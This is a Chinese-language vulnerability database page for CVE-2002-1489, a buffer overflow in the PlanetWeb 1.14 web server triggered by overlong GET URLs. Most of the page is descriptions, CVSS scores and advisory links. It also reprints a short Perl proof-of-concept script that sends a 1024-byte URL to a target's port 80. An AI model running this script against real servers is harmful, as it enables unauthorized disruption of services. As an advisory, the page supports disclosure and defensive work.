CVE-2002-1489
CVSS7.5
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:44
NMCOES    

[原文]Buffer overflow in PlanetDNS PlanetWeb 1.14 and earlier allows remote attackers to execute arbitrary code via (1) an HTTP GET request with a long URL or (2) a request with a long method name.


[CNNVD]PlanetWeb超长GET请求缓冲区溢出漏洞(CNNVD-200304-024)

        PlanetDNS PlanetWeb 1.14及其之之前版本存在缓冲区溢出漏洞。远程攻击者借助(1)带有超长URL的HTTP GET请求或者(2)带有超长方式名的请求执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1489
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1489
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-024
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/10124.php
(VENDOR_ADVISORY)  XF  planetweb-long-url-bo(10124)
http://www.securityfocus.com/bid/5710
(VENDOR_ADVISORY)  BID  5710
http://www.iss.net/security_center/static/10391.php
(VENDOR_ADVISORY)  XF  planetweb-long-url-bo(10391)
http://archives.neohapsis.com/archives/bugtraq/2002-10/0236.html
(VENDOR_ADVISORY)  BUGTRAQ  20021017 New buffer overflow in plaetDNS
http://archives.neohapsis.com/archives/bugtraq/2002-09/0166.html
(UNKNOWN)  BUGTRAQ  20020914 Planet Web Software Buffer Overflow

- 漏洞信息

PlanetWeb超长GET请求缓冲区溢出漏洞
高危 缓冲区溢出
2003-04-02 00:00:00 2005-10-20 00:00:00
远程  
        PlanetDNS PlanetWeb 1.14及其之之前版本存在缓冲区溢出漏洞。远程攻击者借助(1)带有超长URL的HTTP GET请求或者(2)带有超长方式名的请求执行任意代码。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (21795)

PlanetWeb 1.14 Long GET Request Buffer Overflow Vulnerability (EDBID:21795)
windows dos
2002-09-16 Verified
0 UkR-XblP
N/A [点击下载]
source: http://www.securityfocus.com/bid/5710/info

PlanetWeb is a commercially available web server distributed by PlanetDNS. It is available for the Microsoft Windows platform.

PlanetWeb is vulnerable to a buffer overflow condition when handling GET requests of excessive length. Upon receiving a GET request containing a 1024 byte or greater URL, an exploitable buffer overflow occurs. 

This may result in the remote execution of arbitrary code within the context of the web server process.

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server
..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                  PeerAddr  => $host,
                                  PeerPort  => "http(80)",
                                  );
unless ($remote) { die "cannot connect to http daemon on
$host" }
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;		

- 漏洞信息

10468
PlanetDNS PlanetWeb URL Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-09-14 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PlanetWeb Long GET Request Buffer Overflow Vulnerability
Boundary Condition Error 5710
Yes No
2002-09-16 12:00:00 2009-07-11 05:06:00
Discovery credited to UkR-XbIP of of UkR Security Team.

- 受影响的程序版本

PlanetDNS PlanetWeb 1.14

- 漏洞讨论

PlanetWeb is a commercially available web server distributed by PlanetDNS. It is available for the Microsoft Windows platform.

PlanetWeb is vulnerable to a buffer overflow condition when handling GET requests of excessive length. Upon receiving a GET request containing a 1024 byte or greater URL, an exploitable buffer overflow occurs.

This may result in the remote execution of arbitrary code within the context of the web server process.

- 漏洞利用

The following proof of concept code has been supplied by UkR-XblP:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站